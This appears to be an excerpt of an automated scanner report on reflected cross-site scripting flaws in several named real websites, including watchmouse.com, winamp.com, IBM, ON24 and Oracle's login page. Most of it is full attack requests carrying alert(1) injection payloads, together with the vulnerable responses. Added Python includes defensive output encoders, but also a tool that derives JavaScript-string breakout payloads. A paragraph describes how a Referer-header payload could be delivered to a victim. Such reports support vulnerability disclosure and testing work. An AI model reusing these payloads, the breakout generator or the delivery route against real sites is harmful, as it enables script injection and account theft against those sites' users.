GET /assets/css/print.css291e9'-alert(1)-'67bdd5c1b7a?20101008 HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com/en/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:31 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-23e31667bc72ad97513a3b9a533cce89" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13816
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::print.css291e9'-alert(1)-'67bdd5c1b7a?20101008'); var serverRef = encodeURIComponent('http://www.watchmouse.com/en/'); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = '';
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adcd'-alert(1)-'6e92d57bec8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /assets/css/screen.css8adcd'-alert(1)-'6e92d57bec8?20101008 HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com/en/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:32 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-b162fa23d063abe27d39c6c2ca59435b" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::screen.css8adcd'-alert(1)-'6e92d57bec8?20101008'); var serverRef = encodeURIComponent('http://www.watchmouse.com/en/'); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = '';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c623'-alert(1)-'83954da49c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en3c623'-alert(1)-'83954da49c1/ HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:36:45 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-014c46aed482ac19cb678104562d803c" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13508
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::::en3c623'-alert(1)-'83954da49c1'); var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = ''; } requestParams = 'vjsRef='+jsRef ...[SNIP]...
3.67. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.watchmouse.com
Path:
/en/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41203'-alert(1)-'2f529518186 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/?41203'-alert(1)-'2f529518186=1 HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:36:29 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-fff3e345c354e49d8e0d897a110c3ceb" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 18498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::::?41203'-alert(1)-'2f529518186=1'); var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = ''; } requestParams = 'vjsRef='+jsR ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0d30'-alert(1)-'ef346e3dbf0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/api/checkreferrer.phpa0d30'-alert(1)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef= HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com/en/ X-Requested-With: XMLHttpRequest Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=165779128.1298770635.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165779128.1798479609.1298770635.1298770635.1298770635.1; __utmc=165779128; __utmb=165779128.1.10.1298770635
Response
HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:20 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-f7f299238f15fb232758e7723cf59eb8" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 14505
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::checkreferrer.phpa0d30'-alert(1)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef='); var serverRef = encodeURIComponent('http://www.watchmouse.com/en/'); if(document && document.referrer){ jsRef = encode ...[SNIP]...
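The findings on this page reflect input into three different contexts: a double-quoted HTML attribute (the form action on business-software.com and prchecker.info), HTML text between tags (the LinkedIn share-count response and the Bean/method messages) and a single-quoted JavaScript string inside an inline script (sti-cs.com and the watchmouse.com checkReferrer function). Each context needs its own output encoding: HTML-entity encoding alone does not protect a JavaScript string, and a JavaScript escape alone does not stop a literal `</script>` from closing the element, because the HTML parser runs before the JavaScript parser. The Python below is an added example, not code from any of these sites. It implements one encoder per context, renders the page's canary payloads through hypothetical templates shaped like the reflected lines, and checks that the encoded value still decodes to the original. The template functions and their names are assumptions.

```python
import html
import json

# Constructed canaries in the same shape the report uses, one per context.
ATTR_PAYLOAD = 'e4664"><script>alert(1)</script>215d5cf1a41'
TEXT_PAYLOAD = 'bf915<img src=a onerror=alert(1)>77ba82f09ef'
JS_PAYLOAD = "291e9'-alert(1)-'67bdd5c1b7a"
JS_CLOSE_TAG_PAYLOAD = "c8e9b</script><script>alert(1)</script>a1374672bac"


def attr_encode(value: str) -> str:
    """For a value inside a double-quoted HTML attribute: & < > " ' become entities."""
    return html.escape(value, quote=True)


def text_encode(value: str) -> str:
    """For HTML text between tags: & < > become entities (quotes are harmless here)."""
    return html.escape(value, quote=False)


def js_string_encode(value: str) -> str:
    """For a value inside a JavaScript string literal in an inline <script>.

    json.dumps escapes backslashes, double quotes and control characters and,
    with ensure_ascii, the U+2028/U+2029 line terminators. Because the HTML
    parser sees the script body first, < > & are escaped as well, so the value
    can never contain the '</script' sequence that closes the element. The
    single quote is escaped because the templates below use single-quoted
    literals, as the page does.
    """
    s = json.dumps(value, ensure_ascii=True)[1:-1]   # drop JSON's surrounding quotes
    return (s.replace("<", "\\u003c").replace(">", "\\u003e")
             .replace("&", "\\u0026").replace("'", "\\u0027"))


# Hypothetical templates in the shape of the reflected lines on the page.
def render_form_action(path_and_query: str) -> str:
    return '<form method="post" action="%s">' % attr_encode(path_and_query)


def render_share_count_error(url: str) -> str:
    return "<p>Could not fetch share count for %s</p>" % text_encode(url)


def render_check_referrer(ref_string: str) -> str:
    return "var vref_string = encodeURIComponent('%s');" % js_string_encode(ref_string)


def render_check_referrer_vulnerable(ref_string: str) -> str:
    """Raw interpolation, i.e. what the page shows the application doing."""
    return "var vref_string = encodeURIComponent('%s');" % ref_string


def js_round_trip(value: str) -> bool:
    """The encoded literal must still decode to the original value
    (this is encoding, not stripping, so nothing the user typed is lost)."""
    return json.loads('"' + js_string_encode(value) + '"') == value


if __name__ == "__main__":
    print(render_form_action(ATTR_PAYLOAD))
    print(render_share_count_error(TEXT_PAYLOAD))
    print(render_check_referrer_vulnerable(JS_PAYLOAD))
    print(render_check_referrer(JS_PAYLOAD))
    print(render_check_referrer(JS_CLOSE_TAG_PAYLOAD), js_round_trip(JS_CLOSE_TAG_PAYLOAD))
```

The `\uXXXX` form is used for the JavaScript context rather than backslash-quote escaping because it survives both parsers unchanged and cannot be undone by a later HTML-entity decode. A value in a URL-bearing attribute (the form action) would additionally need URL validation of its scheme, which is a separate check from the encoding shown here.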
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c2b5"%3b5abe0529ac9 was submitted in the REST URL parameter 2. This input was echoed as 5c2b5";5abe0529ac9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /media-player/en5c2b5"%3b5abe0529ac9 HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828671740-New%7C1361900671740%3B%20s_nrgvo%3DNew%7C1361900671741%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/media-player%252526ot%25253DA%3B; countryCookie=US
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:45:19 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 46245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... ryCode = "US"; var playerType = ""; var storeUrlGB = "http://shop.winamp.com/store/winamp/en_GB/buy/productID.103591500/quantity.1/ThemeID.1279300"; var storeBundleUrlGB = "null"; var urlLang = "en5c2b5";5abe0529ac9", osDectect = "Windows 7", dispLanguage = "en-us" , pageType = "", winampplayerFull = "http://download.nullsoft.com/winamp/client/winamp5601_full_emusic-7plus_", winampplayerLite = "http://download.nu ...[SNIP]...
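The winamp.com finding above is the case where the scanner could terminate the JavaScript string but could not build a full proof of concept, and asks for a manual check of what validation is in place. The natural next step is to find out which characters survive reflection, since a breakout from a double-quoted JavaScript string needs no HTML tags at all. The Python below is an added example, not the scanner's code or winamp.com's. It reproduces the canary technique the report uses, submitting prefix+character+suffix for each interesting character against two constructed mock applications, classifies each character as intact, stripped, modified or not reflected, and derives a tag-free breakout payload from the result. The mock applications and their filtering behaviour are assumptions, not what winamp.com does.

```python
# Characters a tester cares about when the reflection sits in a JS string.
PROBE_CHARS = ['"', "'", "<", ">", ";", "/", "\\", "(", ")", "`"]


def mock_strip_tags_app(segment: str) -> str:
    """Constructed stand-in (assumed behaviour): angle brackets are removed,
    the double quote survives, and the value lands inside a JS string."""
    cleaned = segment.replace("<", "").replace(">", "")
    return ('var storeBundleUrlGB = "null"; var urlLang = "%s", '
            'osDectect = "Windows 7", dispLanguage = "en-us";' % cleaned)


def mock_backslash_escape_app(segment: str) -> str:
    """Constructed stand-in for an application that escapes the quote instead."""
    cleaned = segment.replace("\\", "\\\\").replace('"', '\\"')
    return 'var urlLang = "%s", dispLanguage = "en-us";' % cleaned


def probe_reflection(app, chars=PROBE_CHARS, pre="5c2b5", post="5abe0529ac9"):
    """Submit pre+char+post for each char and classify what comes back between
    the two canaries: intact, stripped, modified (with the replacement text)
    or not reflected at all. `app` maps the submitted segment to a response body."""
    results = {}
    for ch in chars:
        body = app(pre + ch + post)
        i = body.find(pre)
        j = body.find(post, i + len(pre)) if i >= 0 else -1
        if i < 0 or j < 0:
            results[ch] = ("not reflected", None)
            continue
        between = body[i + len(pre):j]
        if between == ch:
            results[ch] = ("intact", ch)
        elif between == "":
            results[ch] = ("stripped", "")
        else:
            results[ch] = ("modified", between)
    return results


def js_string_breakout(results, quote='"'):
    """Given probe results for a value inside a JS string literal delimited by
    `quote`, return a payload that needs no HTML tags, or None if the string
    cannot be terminated with the characters that survive."""
    def intact(c):
        return results.get(c, ("",))[0] == "intact"

    if not (intact(quote) and intact(";")):
        return None
    if intact("(") and intact(")"):
        call = "alert(1)"
    elif intact("`"):
        call = "alert`1`"          # tagged-template call, no parentheses needed
    else:
        return None
    if intact("/"):
        # Comment out the remainder of the original statement.
        return quote + ";" + call + ";//"
    # No comment available: re-open the string so the rest of the line stays valid JS.
    return quote + ";" + call + ";" + quote


if __name__ == "__main__":
    for app in (mock_strip_tags_app, mock_backslash_escape_app):
        r = probe_reflection(app)
        print(app.__name__, {c: s for c, (s, _) in r.items()})
        print("  breakout:", js_string_breakout(r))
```

Against the first mock the probe reports `<` and `>` stripped but `"`, `;`, `(`, `)` and `/` intact, so the derived payload is `";alert(1);//`, which gives `var urlLang = "";alert(1);//", osDectect = ...` when reflected. Against the second mock the quote comes back as `\"`, which does neutralise it inside a JavaScript string (unlike the HTML attribute case on prchecker.info), so no breakout is offered. Whatever the probe reports, confirm the final payload in a real browser, since the response context decides what the parser does with it.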
The value of the ck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e233"><script>alert(1)</script>9397ad22b9d was submitted in the ck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software9e233"><script>alert(1)</script>9397ad22b9d&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5090c"><script>alert(1)</script>1a96ced61b8 was submitted in the cm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k5090c"><script>alert(1)</script>1a96ced61b8&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cmp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ba58"><script>alert(1)</script>d98038b851d was submitted in the cmp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=000008ba58"><script>alert(1)</script>d98038b851d&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af2a"><script>alert(1)</script>5ffbc7300df was submitted in the cr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google1af2a"><script>alert(1)</script>5ffbc7300df&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the csr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d200c"><script>alert(1)</script>6c7450ed2d9 was submitted in the csr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117d200c"><script>alert(1)</script>6c7450ed2d9&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f22e7"><script>alert(1)</script>84e8fbf3eea was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GWf22e7"><script>alert(1)</script>84e8fbf3eea&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the mkwid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdcaa"><script>alert(1)</script>9a515e2d34d was submitted in the mkwid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22fdcaa"><script>alert(1)</script>9a515e2d34d HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml: ...[SNIP]... /iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22fdcaa"><script>alert(1)</script>9a515e2d34d"> ...[SNIP]...
3.77. https://www14.software.ibm.com/webapp/iwm/web/signup.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www14.software.ibm.com
Path: /webapp/iwm/web/signup.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 439fe"><script>alert(1)</script>0ba8f26f2b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22&439fe"><script>alert(1)</script>0ba8f26f2b2=1 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the User-Agent HTTP header is copied into an HTML comment. The payload d3ae7--><script>alert(1)</script>b0977adf47b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=register HTTP/1.1 Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:21 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=0rvu9xpQXsuNNX5uqSg34XHsQnJPAPazjTKeFaBUv5dhOISD2nsl!865718048; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close
<!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... t 100%. useful to restrict content of two column reg page middlecolumn: # of pixels for middle column. default is 4. fyi: your user-agent string is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b --> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f59"><script>alert(1)</script>a68788fd6cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability. The Referer header is a partial exception: its value is the URL of the page the victim came from, so an attacker who gets the victim to follow a link from a page they control, with the payload in that page's query string (the request below reflects a Google search URL whose q parameter carries the payload, which is exactly this shape), may be able to deliver it without any plugin. Whether the browser sends the full URL depends on the referring page's Referrer-Policy; current browser defaults (strict-origin-when-cross-origin) send only the origin on cross-origin requests, which closes this route unless the referring page relaxes the policy.
Request
GET /mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~...[SNIP]...p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername= HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; 